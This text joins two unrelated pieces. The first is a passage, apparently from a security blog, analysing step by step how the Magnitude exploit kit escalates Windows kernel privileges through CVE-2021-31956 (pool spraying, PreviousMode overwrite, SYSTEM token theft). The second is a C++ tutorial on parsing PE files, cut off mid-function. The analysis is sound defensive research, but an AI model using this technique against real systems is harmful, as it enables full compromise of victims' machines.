Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.
When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10,000 extra _WNF_STATE_DATA structures in a row and frees every other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size.
With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query each one’s ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.
After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.
The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.
What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.
Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.
The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread.
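The subtraction here is the same trick that the CONTAINING_RECORD macro in the Windows headers performs. A sketch with a made-up layout (the real _KTHREAD offsets are build-specific, so the 0x2F8 below is purely illustrative):

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical stand-in for _KTHREAD: given the address of the embedded
// ThreadListEntry field, recover the structure's base address by
// subtracting the field's offset within the structure.
struct FakeKThread {
    uint64_t header[0x2F8 / 8]; // filler up to the list entry (offset is made up)
    void*    ThreadListEntry;
};

FakeKThread* base_from_list_entry(void** entry_addr) {
    auto raw = reinterpret_cast<uintptr_t>(entry_addr);
    return reinterpret_cast<FakeKThread*>(
        raw - offsetof(FakeKThread, ThreadListEntry));
}
```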
With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.
As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.
With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.
Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.
Final Thoughts
If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.
As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, neither exploit chain was particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.
Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race over whether the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.
A dive into the PE file format - LAB 1: Writing a PE Parser
Introduction
In the previous posts, we discussed the basic structure of PE files. In this post, we’re going to apply that knowledge to build a PE file parser in C++ as a proof of concept.
The parser we’re going to build will not be a full parser and is not intended to be used as a reliable tool; it’s only an exercise to better understand the PE file structure.
We’re going to focus on PE32 and PE32+ files, and we’ll only parse the following parts of the file:
DOS Header
Rich Header
NT Headers
Data Directories (within the Optional Header)
Section Headers
Import Table
Base Relocations Table
The code of this project can be found on my GitHub profile.
Initial Setup
Process Outline
We want our parser to follow this process:
Read a file.
Validate that it’s a PE file.
Determine whether it’s a PE32 or a PE32+.
Parse out the following structures:
DOS Header
Rich Header
NT Headers
Section Headers
Import Data Directory
Base Relocation Data Directory
Print out the following information:
File name and type.
DOS Header:
Magic value.
Address of new exe header.
Each entry of the Rich Header, decrypted and decoded.
NT Headers - PE file signature.
NT Headers - File Header:
Machine value.
Number of sections.
Size of Optional Header.
NT Headers - Optional Header:
Magic value.
Size of code section.
Size of initialized data.
Size of uninitialized data.
Address of entry point.
RVA of start of code section.
Desired Image Base.
Section alignment.
File alignment.
Size of image.
Size of headers.
For each Data Directory: its name, RVA and size.
For each Section Header:
Section name.
Section virtual address and size.
Section raw data pointer and size.
Section characteristics value.
Import Table:
For each DLL:
DLL name.
ILT and IAT RVAs.
Whether it’s a bound import or not.
For every imported function:
Ordinal if ordinal/name flag is 1.
Name, hint and Hint/Name table RVA if ordinal/name flag is 0.
Base Relocation Table:
For each block:
Page RVA.
Block size.
Number of entries.
For each entry:
Raw value.
Relocation offset.
Relocation Type.
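The first steps of the outline above — validating that we have a PE file and determining whether it’s PE32 or PE32+ — can be sketched like this. This is a simplified, in-memory check written for illustration (the real parser works through a FILE pointer); the 1/32/64 return convention mirrors the INITPARSE function used later, the magic constants match their winnt.h values, and a little-endian host is assumed:

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Check the DOS "MZ" signature, follow e_lfanew (at offset 0x3C) to the
// "PE\0\0" signature, then read the optional header magic (the first
// field after the 0x18-byte signature + file header) to decide between
// PE32 and PE32+. Returns 1 on failure, 32 or 64 on success.
int pe_kind(const uint8_t* buf, size_t len) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return 1;
    uint32_t e_lfanew;
    std::memcpy(&e_lfanew, buf + 0x3C, 4);       // little-endian read
    if (len < e_lfanew + 0x18 + 2) return 1;
    if (std::memcmp(buf + e_lfanew, "PE\0\0", 4) != 0) return 1;
    uint16_t magic;
    std::memcpy(&magic, buf + e_lfanew + 0x18, 2);
    if (magic == 0x10B) return 32;  // IMAGE_NT_OPTIONAL_HDR32_MAGIC
    if (magic == 0x20B) return 64;  // IMAGE_NT_OPTIONAL_HDR64_MAGIC
    return 1;
}
```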
winnt.h Definitions
We will need the following definitions from the winnt.h header:
Types:
BYTE
WORD
DWORD
QWORD
LONG
LONGLONG
ULONGLONG
Constants:
IMAGE_NT_OPTIONAL_HDR32_MAGIC
IMAGE_NT_OPTIONAL_HDR64_MAGIC
IMAGE_NUMBEROF_DIRECTORY_ENTRIES
IMAGE_DOS_SIGNATURE
IMAGE_DIRECTORY_ENTRY_EXPORT
IMAGE_DIRECTORY_ENTRY_IMPORT
IMAGE_DIRECTORY_ENTRY_RESOURCE
IMAGE_DIRECTORY_ENTRY_EXCEPTION
IMAGE_DIRECTORY_ENTRY_SECURITY
IMAGE_DIRECTORY_ENTRY_BASERELOC
IMAGE_DIRECTORY_ENTRY_DEBUG
IMAGE_DIRECTORY_ENTRY_ARCHITECTURE
IMAGE_DIRECTORY_ENTRY_GLOBALPTR
IMAGE_DIRECTORY_ENTRY_TLS
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
IMAGE_DIRECTORY_ENTRY_IAT
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
IMAGE_SIZEOF_SHORT_NAME
IMAGE_SIZEOF_SECTION_HEADER
Structures:
IMAGE_DOS_HEADER
IMAGE_DATA_DIRECTORY
IMAGE_OPTIONAL_HEADER32
IMAGE_OPTIONAL_HEADER64
IMAGE_FILE_HEADER
IMAGE_NT_HEADERS32
IMAGE_NT_HEADERS64
IMAGE_IMPORT_DESCRIPTOR
IMAGE_IMPORT_BY_NAME
IMAGE_BASE_RELOCATION
IMAGE_SECTION_HEADER
I took these definitions from winnt.h and added them to a new header called winntdef.h.
ILT_ENTRY_32
A structure to represent a 32-bit ILT entry during processing.
The structure will hold a 32-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.
ILT_ENTRY_64
A structure to represent a 64-bit ILT entry during processing.
The structure will hold a 64-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.
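A sketch of what these two unions can look like, reconstructed from the descriptions above. These helpers are not part of winnt.h, so the type and member names are this post’s own; the bit-field layout assumes the usual little-endian compiler ordering (first member in the low bits):

```cpp
#include <cassert>
#include <cstdint>

// 32-bit ILT entry: bit 31 is the ordinal/name flag; when set, the low
// 16 bits are the ordinal number, otherwise the low 31 bits are the
// RVA of the Hint/Name Table entry.
typedef union _ILT_ENTRY_32 {
    struct {
        uint32_t OrdinalNumber   : 16; // valid when OrdinalNameFlag == 1
        uint32_t Reserved        : 15;
        uint32_t OrdinalNameFlag : 1;
    } Ordinal;
    struct {
        uint32_t HintNameTableRVA : 31; // valid when OrdinalNameFlag == 0
        uint32_t OrdinalNameFlag  : 1;
    } Name;
    uint32_t Raw;
} ILT_ENTRY_32;

// 64-bit ILT entry: same idea, but the flag moves to bit 63 and the
// Hint/Name Table RVA is still only 31 bits wide.
typedef union _ILT_ENTRY_64 {
    struct {
        uint64_t OrdinalNumber   : 16;
        uint64_t Reserved        : 47;
        uint64_t OrdinalNameFlag : 1;
    } Ordinal;
    struct {
        uint64_t HintNameTableRVA : 31;
        uint64_t Reserved         : 32;
        uint64_t OrdinalNameFlag  : 1;
    } Name;
    uint64_t Raw;
} ILT_ENTRY_64;
```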
BASE_RELOC_ENTRY
A structure to represent a base relocation entry during processing.
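A possible shape for this helper (again, my own names, not winnt.h): each entry in a base relocation block is a 16-bit value whose low 12 bits are the offset from the block’s page RVA and whose high 4 bits are the relocation type:

```cpp
#include <cassert>
#include <cstdint>

// 16-bit base relocation entry, split with bit fields: Offset occupies
// the low 12 bits, Type the high 4 bits (little-endian field ordering).
typedef union _BASE_RELOC_ENTRY {
    struct {
        uint16_t Offset : 12; // offset from the block's page RVA
        uint16_t Type   : 4;  // e.g. IMAGE_REL_BASED_DIR64 == 0xA
    } Fields;
    uint16_t Raw;
} BASE_RELOC_ENTRY;
```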
Our parser will represent a PE file as an object of either the PE32FILE or the PE64FILE class.
These two classes only differ in some member definitions; their functionality is identical.
Throughout this post we will use the code from PE64FILE.
The only public member beside the class constructor is a function called printInfo() which will print information about the file.
The class constructor takes two parameters, a char array representing the name of the file and a file pointer to the actual data of the file.
After that comes a long series of variable definitions; these class members are used internally during the parsing process, and we’ll mention each of them later.
At the end is a series of method definitions. The first two methods are called locate and resolve, and I will talk about them in a minute.
The rest are functions responsible for parsing different parts of the file, and functions responsible for printing information about the same parts.
Constructor
The constructor of the class simply sets the file pointer and name variables, then it calls the ParseFile() function.
The ParseFile() function calls the other parser functions:
void PE64FILE::ParseFile() {

    // PARSE DOS HEADER
    ParseDOSHeader();

    // PARSE RICH HEADER
    ParseRichHeader();

    // PARSE NT HEADERS
    ParseNTHeaders();

    // PARSE SECTION HEADERS
    ParseSectionHeaders();

    // PARSE IMPORT DIRECTORY
    ParseImportDirectory();

    // PARSE BASE RELOCATIONS
    ParseBaseReloc();
}
Resolving RVAs
Most of the time, we'll have an RVA that we'll need to translate into a file offset.
The process of resolving an RVA can be outlined as follows:
Determine which section range contains that RVA:
Iterate over all sections and for each section compare the RVA to the section virtual address and to the section virtual address added to the virtual size of the section.
If the RVA exists within this range then it belongs to that section.
Calculate the file offset:
Subtract the section's virtual address from the RVA.
Add the result to the section's raw data pointer (PointerToRawData).
An example of this is locating a Data Directory.
The IMAGE_DATA_DIRECTORY structure only gives us an RVA of the directory, to locate that directory we’ll need to resolve that address.
I wrote two functions to do this, first one to locate the virtual address (locate()), second one to resolve the address (resolve()).
locate() iterates over the PEFILE_SECTION_HEADERS array, compares the RVA as described above, then it returns the index of the appropriate section header within the PEFILE_SECTION_HEADERS array.
Please note that in order for these functions to work we’ll need to parse out the section headers and fill the PEFILE_SECTION_HEADERS array first.
We still haven’t discussed this part, but I wanted to talk about the address resolvers first.
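The two resolvers can be sketched as follows. Note that the SectionHeader type below is a simplified stand-in for IMAGE_SECTION_HEADER (only the three fields the algorithm needs), not the author's actual definitions:

```cpp
#include <cstdint>

// Simplified stand-in for IMAGE_SECTION_HEADER; illustration only.
struct SectionHeader {
    uint32_t VirtualAddress;   // RVA of the section start in memory
    uint32_t VirtualSize;      // size of the section in memory
    uint32_t PointerToRawData; // file offset of the section's raw data
};

// Return the index of the section whose virtual range contains the RVA,
// or -1 if no section does.
int locate(const SectionHeader* sections, int count, uint32_t rva) {
    for (int i = 0; i < count; i++) {
        if (rva >= sections[i].VirtualAddress &&
            rva < sections[i].VirtualAddress + sections[i].VirtualSize) {
            return i;
        }
    }
    return -1;
}

// Translate an RVA into a file offset; assumes the RVA falls inside a section.
uint32_t resolve(const SectionHeader* sections, int count, uint32_t rva) {
    int i = locate(sections, count, rva);
    // offset within the section + file offset of the section's raw data
    return (rva - sections[i].VirtualAddress) + sections[i].PointerToRawData;
}
```
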
main function
The main function of the program is fairly simple; it only does two things:
Create a file pointer to the given file, and validate that the file was read correctly.
Call INITPARSE() on the file, and based on the return value it decides between three actions:
Exit.
Create a PE32FILE object, call PrintInfo(), close the file pointer then exit.
Create a PE64FILE object, call PrintInfo(), close the file pointer then exit.
PrintInfo() calls the other print info functions.
```cpp
int main(int argc, char* argv[]) {

	if (argc != 2) {
		printf("Usage: %s [path to executable]\n", argv[0]);
		return 1;
	}

	FILE* PpeFile;
	fopen_s(&PpeFile, argv[1], "rb");

	if (PpeFile == NULL) {
		printf("Can't open file.\n");
		return 1;
	}

	if (INITPARSE(PpeFile) == 1) {
		exit(1);
	}
	else if (INITPARSE(PpeFile) == 32) {
		PE32FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}
	else if (INITPARSE(PpeFile) == 64) {
		PE64FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}

	return 0;
}
```
INITPARSE()
INITPARSE() is a function defined in PEFILE.cpp.
Its only job is to validate that the given file is a PE file, then determine whether the file is PE32 or PE32+.
It reads the DOS header of the file and checks the DOS MZ signature; if it's not found, it returns an error.
After validating the DOS header, it sets the file position to (DOS_HEADER.e_lfanew + size of a DWORD (the PE signature) + size of the File Header), which is the exact offset of the beginning of the Optional Header.
Then it reads a WORD. We know that the first WORD of the Optional Header is a magic value that indicates the file type, so the function compares that WORD to IMAGE_NT_OPTIONAL_HDR32_MAGIC and IMAGE_NT_OPTIONAL_HDR64_MAGIC and, based on the result, returns 32 or 64 (indicating PE32 or PE32+) or an error.
```cpp
int INITPARSE(FILE* PpeFile) {

	___IMAGE_DOS_HEADER TMP_DOS_HEADER;
	WORD PEFILE_TYPE;

	fseek(PpeFile, 0, SEEK_SET);
	fread(&TMP_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, PpeFile);

	if (TMP_DOS_HEADER.e_magic != ___IMAGE_DOS_SIGNATURE) {
		printf("Error. Not a PE file.\n");
		return 1;
	}

	fseek(PpeFile, (TMP_DOS_HEADER.e_lfanew + sizeof(DWORD) + sizeof(___IMAGE_FILE_HEADER)), SEEK_SET);
	fread(&PEFILE_TYPE, sizeof(WORD), 1, PpeFile);

	if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
		return 32;
	}
	else if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
		return 64;
	}
	else {
		printf("Error while parsing IMAGE_OPTIONAL_HEADER.Magic. Unknown Type.\n");
		return 1;
	}
}
```
Parsing DOS Header
ParseDOSHeader()
Parsing the DOS Header is nothing complicated: we just read, from the beginning of the file, a number of bytes equal to the size of the DOS Header, then assign that data to the pre-defined class member PEFILE_DOS_HEADER.
From there we can access all of the struct members; however, we're only interested in e_magic and e_lfanew.
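As a self-contained sketch of this read: the DosHeader type and readDosHeader() below are simplified stand-ins for IMAGE_DOS_HEADER and the author's ParseDOSHeader(), keeping only the two fields we care about at their real offsets:

```cpp
#include <cstdio>
#include <cstdint>

// Simplified stand-in for IMAGE_DOS_HEADER (64 bytes total); only e_magic
// (offset 0x00) and e_lfanew (offset 0x3C) are named, the rest is padding.
#pragma pack(push, 1)
struct DosHeader {
    uint16_t e_magic;      // "MZ" signature
    uint8_t  reserved[58]; // remaining DOS header fields
    uint32_t e_lfanew;     // file offset of the NT Headers
};
#pragma pack(pop)

// Read the DOS header from the start of the file, as the parser does.
bool readDosHeader(FILE* f, DosHeader* out) {
    fseek(f, 0, SEEK_SET);
    return fread(out, sizeof(DosHeader), 1, f) == 1;
}
```
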
```cpp
void PE64FILE::PrintDOSHeaderInfo() {

	printf(" DOS HEADER:\n");
	printf(" -----------\n\n");

	printf(" Magic: 0x%X\n", PEFILE_DOS_HEADER_EMAGIC);
	printf(" File address of new exe header: 0x%X\n", PEFILE_DOS_HEADER_LFANEW);
}
```
Parsing Rich Header
Process
To parse out the Rich Header we’ll need to go through multiple steps.
We don’t know anything about the Rich Header, we don’t know its size, we don’t know where it’s exactly located, we don’t even know if the file we’re processing contains a Rich Header in the first place.
First of all, we need to locate the Rich Header.
We don’t know the exact location, however we have everything we need to locate it.
We know that if a Rich Header exists, then it has to exist between the DOS Stub and the PE signature or the beginning of the NT Headers.
We also know that any Rich Header ends with the 32-bit signature Rich followed by the XOR key.
One might rely on the fixed size of the DOS Header and the DOS Stub, however, the default DOS Stub message can be changed, so that size is not guaranteed to be fixed.
A better approach is to read from the beginning of the file to the start of the NT Headers, then search through that buffer for the Rich sequence. If it's found, we've successfully located the end of the Rich Header; if not, the file most likely doesn't contain a Rich Header.
Once we’ve located the end of the Rich Header, we can read the XOR key, then go backwards starting from the Rich signature and keep XORing 4 bytes at a time until we reach the DanS signature which indicates the beginning of the Rich Header.
After obtaining the position and the size of the Rich Header, we can normally read and process the data.
ParseRichHeader()
This function starts by allocating a buffer on the heap, then it reads e_lfanew size of bytes from the beginning of the file and stores the data in the allocated buffer.
It then goes through a loop doing a linear search byte by byte. In each iteration it compares the current byte and the byte that follows to 0x52 (R) and 0x69 (i).
When the sequence is found, it stores the index in a variable then the loop breaks.
```cpp
char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
fseek(Ppefile, 0, SEEK_SET);
fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

int index_ = 0;

for (int i = 0; i < PEFILE_DOS_HEADER_LFANEW - 1; i++) {
	if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
		index_ = i;
		break;
	}
}

if (index_ == 0) {
	printf("Error while parsing Rich Header.");
	PEFILE_RICH_HEADER_INFO.entries = 0;
	return;
}
```
After that it reads the XOR key, then goes into the decryption loop where in each iteration it increments RichHeaderSize by 4 until it reaches the DanS sequence.
After obtaining the size and the position, it allocates a new buffer for the Rich Header, reads and decrypts the Rich Header, updates PEFILE_RICH_HEADER_INFO with the appropriate data pointer, size and number of entries, then finally it deallocates the buffer it was using for processing.
```cpp
void PE64FILE::ParseRichHeader() {

	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i < PEFILE_DOS_HEADER_LFANEW - 1; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		// "DanS" marks the beginning of the Rich Header
		if (tmpchar[1] == 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {
		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}
	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = { PRODID, BUILDID, USECOUNT };

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}
	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;
}
```
PrintRichHeaderInfo()
This function iterates over each entry in PEFILE_RICH_HEADER and prints its value.
Parsing NT Headers
ParseNTHeaders()
Similar to the DOS Header, all we need to do is read, starting from e_lfanew, a number of bytes equal to the size of IMAGE_NT_HEADERS.
After that we can parse out the contents of the File Header and the Optional Header.
The Optional Header contains an array of IMAGE_DATA_DIRECTORY structures which we care about.
To parse out this information, we can use the IMAGE_DIRECTORY_[...] constants defined in winnt.h as array indexes to access the corresponding IMAGE_DATA_DIRECTORY structure of each Data Directory.
PrintNTHeadersInfo()
This function prints the data obtained from the File Header and the Optional Header, and for each Data Directory it prints its RVA and size.
```cpp
void PE64FILE::PrintNTHeadersInfo() {

	printf(" NT HEADERS:\n");
	printf(" -----------\n\n");

	printf(" PE Signature: 0x%X\n", PEFILE_NT_HEADERS_SIGNATURE);

	printf("\n File Header:\n\n");
	printf(" Machine: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_MACHINE);
	printf(" Number of sections: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS);
	printf(" Size of optional header: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER);

	printf("\n Optional Header:\n\n");
	printf(" Magic: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC);
	printf(" Size of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE);
	printf(" Size of initialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA);
	printf(" Size of uninitialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA);
	printf(" Address of entry point: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT);
	printf(" RVA of start of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE);
	printf(" Desired image base: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE);
	printf(" Section alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT);
